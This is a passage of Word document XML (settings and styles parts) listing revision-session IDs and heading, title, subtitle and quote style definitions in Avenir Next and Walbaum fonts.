    <w:rsid w:val="001B0C36"/>
    <w:rsid w:val="001B1895"/>
    <w:rsid w:val="001C1E6B"/>
    <w:rsid w:val="001D039A"/>
    <w:rsid w:val="001E09DC"/>
    <w:rsid w:val="001E0C5E"/>
    <w:rsid w:val="001F5FC7"/>
    <w:rsid w:val="00201ED1"/>
    <w:rsid w:val="002025EE"/>
    <w:rsid w:val="00213671"/>
    <w:rsid w:val="00221ED9"/>
    <w:rsid w:val="002242E5"/>
    <w:rsid w:val="002266FB"/>
    <w:rsid w:val="00232A83"/>
    <w:rsid w:val="002421BD"/>
    <w:rsid w:val="00245427"/>
    <w:rsid w:val="0029165E"/>
    <w:rsid w:val="002B0EF3"/>
    <w:rsid w:val="002B23BB"/>
    <w:rsid w:val="002B59A2"/>
    <w:rsid w:val="002B797B"/>
    <w:rsid w:val="002D135D"/>
    <w:rsid w:val="002D46F4"/>
    <w:rsid w:val="002E4928"/>
    <w:rsid w:val="002E4ED6"/>
    <w:rsid w:val="002F3B52"/>
    <w:rsid w:val="002F6A1F"/>
    <w:rsid w:val="002F776C"/>
    <w:rsid w:val="002F7E12"/>
    <w:rsid w:val="0030139E"/>
    <w:rsid w:val="00306AB4"/>
    <w:rsid w:val="00307CCC"/>
    <w:rsid w:val="00332229"/>
    <w:rsid w:val="00332CF5"/>
    <w:rsid w:val="003351F3"/>
    <w:rsid w:val="00345A6B"/>
    <w:rsid w:val="00351BA7"/>
    <w:rsid w:val="0035291D"/>
    <w:rsid w:val="00361E1A"/>
    <w:rsid w:val="003751FD"/>
    <w:rsid w:val="003858BF"/>
    <w:rsid w:val="003920C0"/>
    <w:rsid w:val="003936E2"/>
    <w:rsid w:val="003A5D3F"/>
    <w:rsid w:val="003B6416"/>
    <w:rsid w:val="003C6721"/>
    <w:rsid w:val="003D0A92"/>
    <w:rsid w:val="003D6942"/>
    <w:rsid w:val="003F5840"/>
    <w:rsid w:val="00401651"/>
    <w:rsid w:val="00402B1C"/>
    <w:rsid w:val="00402F06"/>
    <w:rsid w:val="004047A1"/>
    <w:rsid w:val="00406DB8"/>
    <w:rsid w:val="0041289E"/>
    <w:rsid w:val="004212D3"/>
    <w:rsid w:val="004252DF"/>
    <w:rsid w:val="0046066B"/>
    <w:rsid w:val="004636E3"/>
    <w:rsid w:val="0046540C"/>
    <w:rsid w:val="00485380"/>
    <w:rsid w:val="004853ED"/>
    <w:rsid w:val="004945AC"/>
    <w:rsid w:val="004A0A96"/>
    <w:rsid w:val="004A1741"/>
    <w:rsid w:val="004C00F2"/>
    <w:rsid w:val="004D1DF2"/>
    <w:rsid w:val="004E0CDC"/>
    <w:rsid w:val="004E1FC0"/>
    <w:rsid w:val="004F75D5"/>
    <w:rsid w:val="00510889"/>
    <w:rsid w:val="00514716"/>
    <w:rsid w:val="005154E3"/>
    <w:rsid w:val="0051742F"/>
    <w:rsid w:val="0052433D"/>
    <w:rsid w:val="00530FC3"/>
    <w:rsid w:val="00543B07"/>
    <w:rsid w:val="00551ABD"/>
    <w:rsid w:val="005545F6"/>
    <w:rsid w:val="0056016A"/>
    <w:rsid w:val="005606E6"/>
    <w:rsid w:val="00567134"/>
    <w:rsid w:val="005753A8"/>
    <w:rsid w:val="005762C5"/>
    <w:rsid w:val="00594157"/>
    <w:rsid w:val="005A15F0"/>
    <w:rsid w:val="005B1F5B"/>
    <w:rsid w:val="005B3549"/>
    <w:rsid w:val="005B4E04"/>
    <w:rsid w:val="005C7644"/>
    <w:rsid w:val="005D54FE"/>
    <w:rsid w:val="005D7933"/>
    <w:rsid w:val="005E25E0"/>
    <w:rsid w:val="005E3B0B"/>
    <w:rsid w:val="005E53A2"/>
    <w:rsid w:val="005E663F"/>
    <w:rsid w:val="005E7FBB"/>
    <w:rsid w:val="005F16B8"/>
    <w:rsid w:val="005F16CD"/>
    <w:rsid w:val="005F550C"/>
    <w:rsid w:val="00603964"/>
    <w:rsid w:val="00610222"/>
    <w:rsid w:val="00611A4A"/>
    <w:rsid w:val="00616DB4"/>
    <w:rsid w:val="006214AB"/>
    <w:rsid w:val="0062735B"/>
    <w:rsid w:val="006316E7"/>
    <w:rsid w:val="00635A65"/>
    <w:rsid w:val="006373B4"/>
    <w:rsid w:val="006413A5"/>
    <w:rsid w:val="00644A0C"/>
    <w:rsid w:val="006476E5"/>
    <w:rsid w:val="006730A9"/>
    <w:rsid w:val="00676749"/>
    <w:rsid w:val="006868CE"/>
    <w:rsid w:val="006905E1"/>
    <w:rsid w:val="006A0365"/>
    <w:rsid w:val="006B09D7"/>
    <w:rsid w:val="006C7653"/>
    <w:rsid w:val="006D373D"/>
    <w:rsid w:val="006D6937"/>
    <w:rsid w:val="006E065F"/>
    <w:rsid w:val="006F140D"/>
    <w:rsid w:val="007055F3"/>
    <w:rsid w:val="00717D92"/>
    <w:rsid w:val="00725E85"/>
    <w:rsid w:val="0072773B"/>
    <w:rsid w:val="007478B9"/>
    <w:rsid w:val="00753A42"/>
    <w:rsid w:val="007572BE"/>
    <w:rsid w:val="00761A1D"/>
    <w:rsid w:val="00773836"/>
    <w:rsid w:val="00775AF7"/>
    <w:rsid w:val="007859A3"/>
    <w:rsid w:val="00791EF0"/>
    <w:rsid w:val="00795B63"/>
    <w:rsid w:val="007A741C"/>
    <w:rsid w:val="007B57C0"/>
    <w:rsid w:val="007C0A71"/>
    <w:rsid w:val="007D1D1B"/>
    <w:rsid w:val="007D5773"/>
    <w:rsid w:val="007D5DE9"/>
    <w:rsid w:val="007D6C1D"/>
    <w:rsid w:val="007E36A4"/>
    <w:rsid w:val="00800894"/>
    <w:rsid w:val="0080712B"/>
    <w:rsid w:val="008079D3"/>
    <w:rsid w:val="008159B9"/>
    <w:rsid w:val="00826B72"/>
    <w:rsid w:val="008304AD"/>
    <w:rsid w:val="00837C73"/>
    <w:rsid w:val="008416F6"/>
    <w:rsid w:val="00843524"/>
    <w:rsid w:val="00845A6A"/>
    <w:rsid w:val="00851173"/>
    <w:rsid w:val="00862BCA"/>
    <w:rsid w:val="0086346A"/>
    <w:rsid w:val="0087064E"/>
    <w:rsid w:val="0087376C"/>
    <w:rsid w:val="00885816"/>
    <w:rsid w:val="00895D35"/>
    <w:rsid w:val="008A09EE"/>
    <w:rsid w:val="008A442C"/>
    <w:rsid w:val="008A4C4A"/>
    <w:rsid w:val="008B1CFC"/>
    <w:rsid w:val="008B4B4B"/>
    <w:rsid w:val="008B6E41"/>
    <w:rsid w:val="008C0C6F"/>
    <w:rsid w:val="008D34E5"/>
    <w:rsid w:val="008D3E1F"/>
    <w:rsid w:val="008D6B27"/>
    <w:rsid w:val="008E2527"/>
    <w:rsid w:val="008F00FE"/>
    <w:rsid w:val="009026C9"/>
    <w:rsid w:val="00902E27"/>
    <w:rsid w:val="00904749"/>
    <w:rsid w:val="00911ABA"/>
    <w:rsid w:val="009143A8"/>
    <w:rsid w:val="0092058B"/>
    <w:rsid w:val="00924E20"/>
    <w:rsid w:val="00932C4C"/>
    <w:rsid w:val="0093525D"/>
    <w:rsid w:val="0093772A"/>
    <w:rsid w:val="00940F9E"/>
    <w:rsid w:val="00955AD3"/>
    <w:rsid w:val="00963E72"/>
    <w:rsid w:val="009874AB"/>
    <w:rsid w:val="00995644"/>
    <w:rsid w:val="009A0FE0"/>
    <w:rsid w:val="009B08AB"/>
    <w:rsid w:val="009B6D97"/>
    <w:rsid w:val="009C2D21"/>
    <w:rsid w:val="009C60E9"/>
    <w:rsid w:val="009D0E17"/>
    <w:rsid w:val="009D488D"/>
    <w:rsid w:val="009E323B"/>
    <w:rsid w:val="009E5628"/>
    <w:rsid w:val="009E6B80"/>
    <w:rsid w:val="00A0164D"/>
    <w:rsid w:val="00A04A14"/>
    <w:rsid w:val="00A0535C"/>
    <w:rsid w:val="00A07A33"/>
    <w:rsid w:val="00A169FD"/>
    <w:rsid w:val="00A322DA"/>
    <w:rsid w:val="00A32550"/>
    <w:rsid w:val="00A3452E"/>
    <w:rsid w:val="00A34865"/>
    <w:rsid w:val="00A427D6"/>
    <w:rsid w:val="00A44886"/>
    <w:rsid w:val="00A5704D"/>
    <w:rsid w:val="00A63CAC"/>
    <w:rsid w:val="00A64ACA"/>
    <w:rsid w:val="00A65B94"/>
    <w:rsid w:val="00A67F3A"/>
    <w:rsid w:val="00A70FC3"/>
    <w:rsid w:val="00A732EA"/>
    <w:rsid w:val="00A77ABE"/>
    <w:rsid w:val="00A819EF"/>
    <w:rsid w:val="00A85F35"/>
    <w:rsid w:val="00A9039F"/>
    <w:rsid w:val="00A91843"/>
    <w:rsid w:val="00AA292C"/>
    <w:rsid w:val="00AB28CD"/>
    <w:rsid w:val="00AC7741"/>
    <w:rsid w:val="00AD04A2"/>
    <w:rsid w:val="00B022DF"/>
    <w:rsid w:val="00B031AD"/>
    <w:rsid w:val="00B03A74"/>
    <w:rsid w:val="00B16881"/>
    <w:rsid w:val="00B20DAE"/>
    <w:rsid w:val="00B27368"/>
    <w:rsid w:val="00B279DF"/>
    <w:rsid w:val="00B33AD2"/>
    <w:rsid w:val="00B41D67"/>
    <w:rsid w:val="00B52C01"/>
    <w:rsid w:val="00B55FEA"/>
    <w:rsid w:val="00B64284"/>
    <w:rsid w:val="00B76A7A"/>
    <w:rsid w:val="00BA1A9E"/>
    <w:rsid w:val="00BA4545"/>
    <w:rsid w:val="00BB1D47"/>
    <w:rsid w:val="00BB62A8"/>
    <w:rsid w:val="00BC2CE6"/>
    <w:rsid w:val="00BC750D"/>
    <w:rsid w:val="00BD56F4"/>
    <w:rsid w:val="00BD5C2D"/>
    <w:rsid w:val="00BF13B3"/>
    <w:rsid w:val="00BF233D"/>
    <w:rsid w:val="00C161E7"/>
    <w:rsid w:val="00C31DDE"/>
    <w:rsid w:val="00C35C9A"/>
    <w:rsid w:val="00C416A9"/>
    <w:rsid w:val="00C417A7"/>
    <w:rsid w:val="00C43C2B"/>
    <w:rsid w:val="00C477FD"/>
    <w:rsid w:val="00C506D6"/>
    <w:rsid w:val="00C57D43"/>
    <w:rsid w:val="00C64E56"/>
    <w:rsid w:val="00C6679D"/>
    <w:rsid w:val="00C83DF8"/>
    <w:rsid w:val="00C83FD0"/>
    <w:rsid w:val="00C959B0"/>
    <w:rsid w:val="00CA11A7"/>
    <w:rsid w:val="00CB1007"/>
    <w:rsid w:val="00CB6BB8"/>
    <w:rsid w:val="00CD319E"/>
    <w:rsid w:val="00CE0226"/>
    <w:rsid w:val="00D018CB"/>
    <w:rsid w:val="00D03EF8"/>
    <w:rsid w:val="00D102BD"/>
    <w:rsid w:val="00D33794"/>
    <w:rsid w:val="00D339C4"/>
    <w:rsid w:val="00D33A1E"/>
    <w:rsid w:val="00D40963"/>
    <w:rsid w:val="00D456C3"/>
    <w:rsid w:val="00D46FF5"/>
    <w:rsid w:val="00D47754"/>
    <w:rsid w:val="00D506D1"/>
    <w:rsid w:val="00D51431"/>
    <w:rsid w:val="00D610C2"/>
    <w:rsid w:val="00D64C97"/>
    <w:rsid w:val="00D72CEF"/>
    <w:rsid w:val="00D90155"/>
    <w:rsid w:val="00D92C42"/>
    <w:rsid w:val="00D97DFB"/>
    <w:rsid w:val="00DA678C"/>
    <w:rsid w:val="00DB1515"/>
    <w:rsid w:val="00DC0099"/>
    <w:rsid w:val="00DE7B9B"/>
    <w:rsid w:val="00E003DE"/>
    <w:rsid w:val="00E126D8"/>
    <w:rsid w:val="00E14A41"/>
    <w:rsid w:val="00E277C9"/>
    <w:rsid w:val="00E51589"/>
    <w:rsid w:val="00E52596"/>
    <w:rsid w:val="00E537A3"/>
    <w:rsid w:val="00E644B7"/>
    <w:rsid w:val="00E7283A"/>
    <w:rsid w:val="00E81FB2"/>
    <w:rsid w:val="00E83E01"/>
    <w:rsid w:val="00E91D43"/>
    <w:rsid w:val="00EA1B34"/>
    <w:rsid w:val="00EB1D83"/>
    <w:rsid w:val="00EB2D47"/>
    <w:rsid w:val="00EB6716"/>
    <w:rsid w:val="00ED1AF7"/>
    <w:rsid w:val="00ED5BD6"/>
    <w:rsid w:val="00ED7F75"/>
    <w:rsid w:val="00F13CC9"/>
    <w:rsid w:val="00F151E1"/>
    <w:rsid w:val="00F1745C"/>
    <w:rsid w:val="00F20D58"/>
    <w:rsid w:val="00F25534"/>
    <w:rsid w:val="00F27B9E"/>
    <w:rsid w:val="00F30D72"/>
    <w:rsid w:val="00F348B0"/>
    <w:rsid w:val="00F367AE"/>
    <w:rsid w:val="00F4252A"/>
    <w:rsid w:val="00F445CB"/>
    <w:rsid w:val="00F4622A"/>
    <w:rsid w:val="00F50AB7"/>
    <w:rsid w:val="00F60209"/>
    <w:rsid w:val="00F63DD8"/>
    <w:rsid w:val="00F64A90"/>
    <w:rsid w:val="00F7085C"/>
    <w:rsid w:val="00F72C2E"/>
    <w:rsid w:val="00F80B78"/>
    <w:rsid w:val="00F90315"/>
    <w:rsid w:val="00F9199D"/>
    <w:rsid w:val="00FA1072"/>
    <w:rsid w:val="00FB5040"/>
    <w:rsid w:val="00FC56AD"/>
    <w:rsid w:val="00FD62DB"/>
    <w:rsid w:val="00FE33FA"/>
    <w:rsid w:val="00FE498A"/>
    <w:rsid w:val="00FE742B"/>
    <w:rsid w:val="0BF31FFF"/>
    <w:rsid w:val="0C590F0F"/>
    <w:rsid w:val="0C80781B"/>
    <w:rsid w:val="0D511CAE"/>
    <w:rsid w:val="0E1DD571"/>
    <w:rsid w:val="0FB9A5D2"/>
    <w:rsid w:val="1DC0A404"/>
    <w:rsid w:val="1F5C7465"/>
    <w:rsid w:val="21624631"/>
    <w:rsid w:val="296B6558"/>
    <w:rsid w:val="3216A0B6"/>
    <w:rsid w:val="32515583"/>
    <w:rsid w:val="34C9115C"/>
    <w:rsid w:val="36CF03A5"/>
    <w:rsid w:val="39FB324A"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rsid w:val="40E48D99"/>
    <w:rsid w:val="490F53A0"/>
    <w:rsid w:val="4D463A4D"/>
    <w:rsid w:val="4F66CE88"/>
    <w:rsid w:val="51CF57AC"/>
    <w:rsid w:val="536B280D"/>
    <w:rsid w:val="61FFDD5B"/>
    <w:rsid w:val="6B98DDCE"/>
    <w:rsid w:val="6B9A3F8F"/>
    <w:rsid w:val="6D301BA3"/>
    <w:rsid w:val="6ECBEC04"/>
    <w:rsid w:val="71F058B6"/>
    <w:rsid w:val="7233D143"/>
    <w:rsid w:val="7527F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24ED0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0678DADB-F79A-4968-920F-439B5AD1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B27"/>
    <w:pPr>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Display"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="42"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:color w:val="5066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EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Display Light"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:sz w:val="76"/>
      <w:szCs w:val="76"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Display Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>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EFF00EC"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="360"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:ind w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Display"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="42"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Heading"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Display Light"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:sz w:val="76"/>
      <w:szCs w:val="76"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Walbaum Display Light"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5066DB"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
      <w:b w:val="0"/>
